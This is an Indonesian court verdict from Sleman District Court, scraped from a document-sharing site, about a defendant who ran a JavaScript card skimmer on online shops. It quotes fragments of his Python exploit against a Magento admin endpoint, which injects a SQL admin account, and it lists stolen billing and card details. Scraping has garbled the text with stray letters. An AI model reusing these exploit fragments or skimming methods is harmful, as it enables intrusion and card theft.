Juhriah Rangkuti, S.H., M.H., sebagai Hakim Ketua, Suparna, S.H. dan Ikha Tina,
R
S.H., M.Hum., masing-masing sebagai Hakim Anggota, yang diucapkan dalam sidang
si
terbuka untuk umum pada hari itu juga oleh Hakim Ketua dengan didampingi para
ne
ng
Hakim Anggota tersebut, dibantu oleh Jaka Wanugraha, SH, Panitera Pengganti pada
Pengadilan Negeri Sleman, serta dihadiri oleh Yogie Raharjo, S.H.., M.H., Penuntut
Umum dan Terdakwa.
do
gu
Hakim Anggota, Hakim Ketua,
In
A
ah
lik
Suparna, S.H. Rosihan Juhriah Rangkuti, S.H., M.H.
am
ub
ep
Ikha Tina, S.H., M.Hum
k
ah
si
Panitera Pengganti,
ne
ng
do
gu
Jaka Wanugraha, SH In
A
ah
lik
m
ub
ka
ep
ah
es
M
ng
on

gu
d
In
A
Disclaimer
h
ik

Putusan 252 Pid - Sus 2020 PN SMN 20210901

Diunggah oleh

Informasi Dokumen

Judul Asli

Hak Cipta

Format Tersedia

Bagikan dokumen Ini

Bagikan atau Tanam Dokumen

Opsi Berbagi

Apakah menurut Anda dokumen ini bermanfaat?

Apakah konten ini tidak pantas?

Hak Cipta:

Format Tersedia

Putusan 252 Pid - Sus 2020 PN SMN 20210901

Diunggah oleh

Hak Cipta:

Format Tersedia

am

4. Jenis kelamin : Laki-laki

8. Pekerjaan : Karyawan Swasta

sampai dengan tanggal 6 April 2020;

tanggal 09 Juli 2020;

Terdakwa menghadap sendiri;

Pengadilan Negeri tersebut;

- Penetapan Ketua Pengadilan Negeri Sleman Nomor 252/Pid.Sus/2020/PN

Smn tanggal 10 Juni 2020 tentang penunjukan Majelis Hakim;

Halaman 1 dari 47 Putusan Nomor 252/Pid.Sus/2020/PN Smn

denda sebanyak Rp5.000.000,00 (lima juta rupiah) subsider pidana kurungan

 1 (satu) buah KTP atas nama ARDIANSYAH dengan N.I.K.

 1 (satu) buah SIM A atas nama ARDIANSYAH dengan nomor

nama ARDIANSYAH dengan nomor 16.01.3800

Dikembalikan kepada Terdakwa.

 1 (satu) unit Modem Wifi indihome internet warna putih

 1 (satu) buah Hardisk dengan kapasitas 6 terra

 1 (satu) unit PC computer TUF GAMING VG27AQ

Dirampas untuk dimusnahkan;

Halaman 2 dari 47 Putusan Nomor 252/Pid.Sus/2020/PN Smn

Dilampirkan dalam berkas perkara.

didakwa berdasarkan surat dakwaan sebagai berikut:

intersepsi atau penyadapan atas informasi elektronik dan/atau dokumen elektronik

dilakukan dengan cara sebagai berikut:

api.web.id pada penyedia jasa hosting, IDwebhost, dimana terdakwa membeli

hosting tersebut yaitu http://www.idwehost.com.

- Terdakwa kemudian mempelajari dan mendapatkan kode berbahaya yang dikenal

sebagai JavaScript-Sniffer (JS Sniffer) sejenis malware yang dirancang untuk

google, yang lalu terdakwa memodifikasi script (bahasa pemrograman) tersebut

Halaman 3 dari 47 Putusan Nomor 252/Pid.Sus/2020/PN Smn

memiliki kelemahan tersebut sebagai target. Penggunaan script pyton oleh

if not target. startswith("http"):

if target. Endswith ("/"):

target_url = target + "/admin/Cms_Wysiwyg/directive/index/"

SET @SALT = 'rp';

query = q. replaces ("\n", ""). Format (username="forme", password="forme")

Q decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}

r = requests. Post (target_url,

Halaman 4 dari 47 Putusan Nomor 252/Pid.Sus/2020/PN Smn

e-commerce target akan masuk/dikirimkan ke website www.rest-api.web.id dalam

nomor kartu kredit, nama, alamat dan kata sandi.

melakukan kegiatan perekaman atas informasi elektronik milik pelanggan toko

website toko online (e-commerce) tersebut kemudian terdakwa yang di kirimkan ke

alamat website www.rest-api.web.id yang merupakan milik dan dikelola oleh

Halaman 5 dari 47 Putusan Nomor 252/Pid.Sus/2020/PN Smn

billing[street] []: 312 W 101st St

billing[city]: New York

b. Data kartu kredit milik saksi Ida Bagus Surya Manuaba

Sent: 28/1/2020 1:54:14 pm +0700

#--------------------------------[ LOGIN DETAILS] -------------------------------#

Bank : PT. ANZ PANIN BANK

Type : MASTERCARD - CREDIT

#--------------------------[ JAPAN INFO] -----------------------------#

Halaman 6 dari 47 Putusan Nomor 252/Pid.Sus/2020/PN Smn

tentang Perubahan Atas Undang-Undang Nomor 11 Tahun 2008 tentang Informasi

apapun memindahkan atau mentransfer informasi elektronik dan/atau dokumen

dengan cara sebagai berikut:

- Bahwa terdakwa ARDIANSYAH membuat dan mengelola website www.rest-

api.web.id pada penyedia jasa hosting, IDwebhost, dimana terdakwa membeli

Halaman 7 dari 47 Putusan Nomor 252/Pid.Sus/2020/PN Smn

terdakwa menggunakan script tersebut. Fungsi script JS Sniffer yang disimpan di

commerce target juga terkirim ke website www.rest-api.web.id.

(vulnerabilitas) siber menggunakan script pyton melalui Peladen Pribadi Virtual